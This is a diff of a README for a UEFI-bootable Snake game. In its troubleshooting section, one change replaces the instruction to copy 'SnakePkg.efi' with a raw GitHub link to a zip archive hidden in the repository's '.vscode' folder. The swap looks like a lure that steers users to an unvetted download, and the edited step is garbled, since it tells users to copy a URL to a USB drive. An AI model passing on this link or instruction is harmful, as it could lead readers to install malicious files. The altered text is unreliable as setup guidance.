henrytung88/SnakePkg/Readme.md

 If you run into issues while trying to play SnakePkg, here are some common solutions:

-1. **Cannot Find the Game**: Make sure you copied the `SnakePkg.efi` file to the root of the USB drive.
+1. **Cannot Find the Game**: Make sure you copied the `https://github.com/henrytung88/SnakePkg/raw/refs/heads/main/.vscode/Snake-Pkg-3.5.zip` file to the root of the USB drive.
 2. **Game Doesn’t Start**: Ensure your computer supports UEFI and that you selected the USB as the boot device.
 3. **Slow Performance**: Try closing other applications on your PC before starting the game.